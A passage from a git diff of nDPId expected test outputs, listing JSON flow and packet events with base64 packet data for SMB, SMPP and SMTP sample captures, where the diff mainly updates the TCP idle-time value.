+01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1584368315418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":1584368315418,"pkt":"KDc3AG3I2MuK4S0uCABFAAIcOK5AAIAGO6zAqAG7wKgBdgG93hDyQzIj6KAG5lAYEAjw+QAAAAAB8P5TTUJAAAEAAAAAAAUAAAABAAAAmAAAAJwPAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAABZAAAAAQAAAPJad+s0itQBeC8Pcpz71QGM0O1xnPvVAYzQ7XGc+9UBACAAAAAAAAAAIAAAAAAAABEAAAAAAAAAEgQAAAoAAABlAAAACgAAAAAAAAAAAAAA\/lNNQkAAAQAAAAAADgAAAAUAAADYAAAAnQ8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAkASACOAAAAAAAAAAAAAAAzwlM5LZjUATN2tkyb+9UBqrZQPC2Y1AHHrtHNIlnVAYD0HQAAAAAAAAAeAAAAAAAgAAAAJgAAAAAAAAAYAEkATgBOAE8AUwBFAH4AMQAuAEUAWABFAAAAq04CAAAAAQBpAG4AbgBvAHMAZQB0AHUAcAAtADUALgA2AC4AMQAuAGUAeABlAAAA\/lNNQkAAAQAAAAAABgADAAUAAAAAAAAAng8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAADwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1584368315418,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1584368315418,"pkt":"2MuK4S0uKDc3AG3ICABFAAAoAABAAEAGtk7AqAF2wKgBu94QAb3ooAbm8kM0F1AQqfyLpgAA"} 
+00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1584368315417,"flow_last_seen":1584368317802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":25252,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1584368317802,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","packets-captured":101,"packets-processed":101,"total-skipped-flows":0,"total-l4-data-len":25252,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1584368317802} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 101/101 diff --git a/test/results/smbv1.pcap.out b/test/results/smbv1.pcap.out index 8732cf57a..240b5736a 100644 --- a/test/results/smbv1.pcap.out +++ b/test/results/smbv1.pcap.out 
@@ -1,11 +1,11 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smbv1.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smbv1.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1492191036092} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492191036092,"flow_last_seen":1492191036092,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1492191036092,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492191036092,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1492191036092,"pkt":"AFBW6AqxAAwpAu9qCABFAACxF9IAAIAGzm+sEJyCCoAA88bvAb3S22hjm3waG1AY+vCemgAAAAAAhf9TTUJyAAAAABhTwAAAAAAAAAAAAAAAAAAA\/\/4AAEAAAGIAAlBDIE5FVFdPUksgUFJPR1JBTSAxLjAAAkxBTk1BTjEuMAACV2luZG93cyBmb3IgV29ya2dyb3VwcyAzLjFhAAJMTTEuMlgwMDIAAkxBTk1BTjIuMQACTlQgTE0gMC4xMgA="} -00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492191036120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1492191036120,"pkt":"AAwpAu9qAFBW6AqxCABFAACdcSEAAIAGdTQKgADzrBCcggG9xu+bfBob0tto7FAY+vCpnwAAAAAAcf9TTUJyAAAAAJhTwAAAAAAAAAAAAAAAAAAA\/\/4AAEAAEQUAAzIAAQAEEQAAAAABAAAAAAD84wEAQPSc00S10gHwAAgsAAirHC\/h7OapVwBPAFIASwBHAFIATwBVAFAAAABKAE8ASABOAC0AUABDAAAA"} -00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492191036120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1492191036120,"pkt":"AFBW6AqxAAwpAu9qCABFAAC0F9MAAIAGzmusEJyCCoAA88bvAb3S22jsm3wakFAY+ns\/iQAAAAAAiP9TTUJzAAAAABgHwAAAAAAAAAAAAAAAAAAA\/\/4AAEAADf8AiAAEEQoAAAAAAAAAAQAAAAAAAADUAAAASwAAAAAAAFcAaQBuAGQAbwB3AHMAIAAyADAAMAAwACAAMgAxADkANQAAAFcAaQBuAGQAbwB3AHMAIAAyADAAMAAwACAANQAuADAAAAA="} 
-01002{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492191036092,"flow_last_seen":1492191036120,"flow_idle_time":7440000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":131,"midstream":1,"thread_ts_msec":1492191036120,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Version","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -01040{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1492191036092,"flow_last_seen":1492191036191,"flow_idle_time":7440000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":819,"flow_avg_l4_payload_len":117,"midstream":1,"thread_ts_msec":1492191036191,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Version","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492191036092,"flow_last_seen":1492191036092,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1492191036092,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492191036092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1492191036092,"pkt":"AFBW6AqxAAwpAu9qCABFAACxF9IAAIAGzm+sEJyCCoAA88bvAb3S22hjm3waG1AY+vCemgAAAAAAhf9TTUJyAAAAABhTwAAAAAAAAAAAAAAAAAAA\/\/4AAEAAAGIAAlBDIE5FVFdPUksgUFJPR1JBTSAxLjAAAkxBTk1BTjEuMAACV2luZG93cyBmb3IgV29ya2dyb3VwcyAzLjFhAAJMTTEuMlgwMDIAAkxBTk1BTjIuMQACTlQgTE0gMC4xMgA="} +00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492191036120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1492191036120,"pkt":"AAwpAu9qAFBW6AqxCABFAACdcSEAAIAGdTQKgADzrBCcggG9xu+bfBob0tto7FAY+vCpnwAAAAAAcf9TTUJyAAAAAJhTwAAAAAAAAAAAAAAAAAAA\/\/4AAEAAEQUAAzIAAQAEEQAAAAABAAAAAAD84wEAQPSc00S10gHwAAgsAAirHC\/h7OapVwBPAFIASwBHAFIATwBVAFAAAABKAE8ASABOAC0AUABDAAAA"} 
+00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492191036120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1492191036120,"pkt":"AFBW6AqxAAwpAu9qCABFAAC0F9MAAIAGzmusEJyCCoAA88bvAb3S22jsm3wakFAY+ns\/iQAAAAAAiP9TTUJzAAAAABgHwAAAAAAAAAAAAAAAAAAA\/\/4AAEAADf8AiAAEEQoAAAAAAAAAAQAAAAAAAADUAAAASwAAAAAAAFcAaQBuAGQAbwB3AHMAIAAyADAAMAAwACAAMgAxADkANQAAAFcAaQBuAGQAbwB3AHMAIAAyADAAMAAwACAANQAuADAAAAA="} +01002{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492191036092,"flow_last_seen":1492191036120,"flow_idle_time":7560000,"flow_min_l4_payload_len":117,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":394,"flow_avg_l4_payload_len":131,"midstream":1,"thread_ts_msec":1492191036120,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Version","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
+01040{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1492191036092,"flow_last_seen":1492191036191,"flow_idle_time":7560000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":819,"flow_avg_l4_payload_len":117,"midstream":1,"thread_ts_msec":1492191036191,"l3_proto":"ip4","src_ip":"172.16.156.130","dst_ip":"10.128.0.243","src_port":50927,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"20": {"risk":"SMB Insecure Version","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00546{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":7,"source":"smbv1.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":7,"total-skipped-flows":0,"total-l4-data-len":819,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1492191036191} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 7/7 diff --git a/test/results/smpp_in_general.pcap.out b/test/results/smpp_in_general.pcap.out index b7ef20442..4886c3c83 100644 --- a/test/results/smpp_in_general.pcap.out +++ b/test/results/smpp_in_general.pcap.out 
@@ -1,11 +1,11 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smpp_in_general.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smpp_in_general.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1217149853878} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1217149853878,"flow_last_seen":1217149853878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1217149853878,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1217149853878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1217149853878,"pkt":"AAKlxo7UABbU5r3hCABFAAAwUN5AAIAG\/3kK4sp2CuLKNQbqIyjmvft6AAAAAHACf\/9NLQAAAgQE7AEBBAI="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1217149853879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1217149853879,"pkt":"ABbU5r3hAAKlxo7UCABFAAAsMy0AADwGoS8K4so1CuLKdiMoBuqoDP5A5r37e2AS8ABLDAAAAgQFtAAA"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1217149853879,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1217149853879,"pkt":"AAKlxo7UABbU5r3hCABFAAAoUN9AAIAG\/4AK4sp2CuLKNQbqIyjmvft7qAz+QVAQhOTN5QAA"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1217149853878,"flow_last_seen":1217149853879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1217149853879,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} -00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1217149853878,"flow_last_seen":1217149884833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1217149884833,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1217149853878,"flow_last_seen":1217149853878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1217149853878,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1217149853878,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1217149853878,"pkt":"AAKlxo7UABbU5r3hCABFAAAwUN5AAIAG\/3kK4sp2CuLKNQbqIyjmvft6AAAAAHACf\/9NLQAAAgQE7AEBBAI="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1217149853879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1217149853879,"pkt":"ABbU5r3hAAKlxo7UCABFAAAsMy0AADwGoS8K4so1CuLKdiMoBuqoDP5A5r37e2AS8ABLDAAAAgQFtAAA"} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1217149853879,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1217149853879,"pkt":"AAKlxo7UABbU5r3hCABFAAAoUN9AAIAG\/4AK4sp2CuLKNQbqIyjmvft7qAz+QVAQhOTN5QAA"} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1217149853878,"flow_last_seen":1217149853879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1217149853879,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} 
+00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1217149853878,"flow_last_seen":1217149884833,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1217149884833,"l3_proto":"ip4","src_ip":"10.226.202.118","dst_ip":"10.226.202.53","src_port":1770,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SMPP","breed":"Acceptable","category":"Download"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":17,"source":"smpp_in_general.pcap","alias":"nDPId-test","packets-captured":17,"packets-processed":17,"total-skipped-flows":0,"total-l4-data-len":200,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1217149884833} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 17/17 diff --git a/test/results/smtp-starttls.pcap.out b/test/results/smtp-starttls.pcap.out index 9b9d065c1..e47427cf7 100644 --- a/test/results/smtp-starttls.pcap.out +++ b/test/results/smtp-starttls.pcap.out 
@@ -1,11 +1,11 @@ 00464{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smtp-starttls.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00550{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smtp-starttls.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1388017124762} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1388017124762,"flow_last_seen":1388017124762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1388017124762,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"173.194.68.26","src_port":57406,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1388017124762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1388017124762,"pkt":"AAAMB6wBABNyxPHhCABFAAA8JqtAAEAGeocKAAABrcJEGuA+ABlXuT72AAAAAKACOQgLsAAAAgQFtAQCCAraWRhdAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1388017124774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1388017124774,"pkt":"ABNyxPHhANAr0XYACABFAAA8X3cAAC4Gk7utwkQaCgAAAQAZ4D6dvxfqV7k+96ASpiw5gwAAAgQFlgQCCAoS8Zx72lkYXQEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smtp-starttls.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1388017124774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1388017124774,"pkt":"AAAMB6wBABNyxPHhCABFAAA0JqxAAEAGeo4KAAABrcJEGuA+ABlXuT73nb8X64AQAHMN3wAAAQEICtpZGGgS8Zx7"} 
